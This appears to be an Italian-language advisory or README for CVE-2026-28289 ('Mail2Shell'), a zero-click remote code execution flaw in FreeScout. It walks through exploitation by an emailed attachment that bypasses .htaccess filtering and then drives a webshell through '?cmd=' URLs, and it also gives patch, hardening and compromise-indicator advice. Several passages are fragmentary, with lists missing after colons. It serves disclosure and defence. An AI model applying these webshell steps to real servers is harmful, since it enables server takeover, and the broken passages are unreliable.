
CVE-2026-28289

RCE zero-click non autenticata in FreeScout tramite bypass degli allegati email
CVE-2026-28289, soprannominata Mail2Shell, è una vulnerabilità critica di Remote Code Execution (RCE) zero-click che colpisce FreeScout.
Un attaccante può inviare un'email appositamente predisposta a una casella di posta di FreeScout e ottenere accesso remoto alla shell del server sottostante — senza autenticazione e senza alcuna interazione da parte dell'utente.
| Campo | Valore |
|---|
| CVE ID | CVE-2026-28289 |
| Severità | 🔴 Critica |
| CVSS | 10.0 (Massimo) |
| Vettore d'attacco | Remoto (Email) |
| Autenticazione richiesta | ❌ Nessuna |
| Interazione utente | ❌ Nessuna |
| Impatto | Compromissione totale del server |
L'attaccante invia un'email con un allegato appositamente predisposto.
FreeScout tenta di bloccare file pericolosi come .htaccess, ma l'attaccante:
L'attaccante accede al file caricato tramite percorso web ed esegue comandi arbitrari.
Risultato:
# Remote shell access achieved
whoami
www-data

✅ Email sent successfully! (Zero-Click RCE triggered)
Vedrai anche stampate le istruzioni per i passaggi successivi.
find sul tuo server FreeScout via SSHRestituirà immediatamente il percorso reale completo del file caricato, ad esempio:
/var/www/html/storage/attachment/2026/03/05/15/webshell.txt
(o una cartella simile con data/ora — questo conferma che FreeScout ha salvato automaticamente l'allegato).
Copia il percorso del passaggio 2 e apri questo URL:
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=whoami
Vedrai esattamente questo output (testo semplice):
www-data
(O qualunque sia l'utente Apache/PHP sul tuo server — di solito www-data, apache o nobody).
Ora cambia il comando e aggiorna la pagina:
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=id
Vedrai:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
E per ls -la:
total 12
drwxr-xr-x 2 www-data www-data 4096 Mar 5 15:00 .
drwxr-xr-x 8 www-data www-data 4096 Mar 5 14:00 ..
-rw-r--r-- 1 www-data www-data 87 Mar 5 15:00 webshell.txt
Questo output appare direttamente nella pagina del browser (all'interno dei tag <pre> della webshell). Nessun errore, nessun codice sorgente PHP, nessun 404.
Questo significa che hai piena esecuzione remota di codice sul server — il bypass .htaccess + spazio a larghezza zero ha funzionato perfettamente e l'allegato email è stato elaborato senza alcuna interazione da parte dell'utente.
Tutte le versioni di FreeScout:
<= 1.8.206
Aggiorna immediatamente a:
1.8.207 or later
AllowOverride All nella configurazione di ApacheCerca:
.htaccess sospetti/storage/attachments/Gli indicatori di compromissione possono includere:
.htaccess sconosciuti nelle cartelle degli allegatiEmail → Malicious Attachment (Unicode prefixed filename)
↓
Saved to predictable path
↓
Web-accessible execution
↓
Remote shell
Questo problema ha bypassato le protezioni aggiunte in:
Dimostrando una logica incompleta di sanificazione dei nomi file.
| Area di rischio | Impatto |
|---|---|
| Riservatezza | 🔴 Alto |
| Integrità | 🔴 Alto |
| Disponibilità | 🔴 Alto |
Se gestisci un'istanza self-hosted di FreeScout:
🔥 Applica subito la patch. 💡 Parti dal presupposto di essere compromessi se esegui versioni vulnerabili esposte a Internet. 🛡 Esegui una revisione dei log e controlli di integrità.